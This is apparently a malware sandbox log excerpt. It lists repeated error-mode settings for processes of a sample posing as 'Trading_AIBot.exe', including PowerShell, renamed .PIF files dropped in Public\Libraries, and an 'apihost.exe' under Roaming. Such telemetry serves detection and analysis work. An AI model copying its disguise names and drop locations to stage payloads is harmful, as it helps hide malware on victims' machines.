Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Juqmtmya.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\aymtmquJ.pif Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Juqmtmya.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\aymtmquJ.pif Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe Process information set: NOOPENFILEERRORBOX
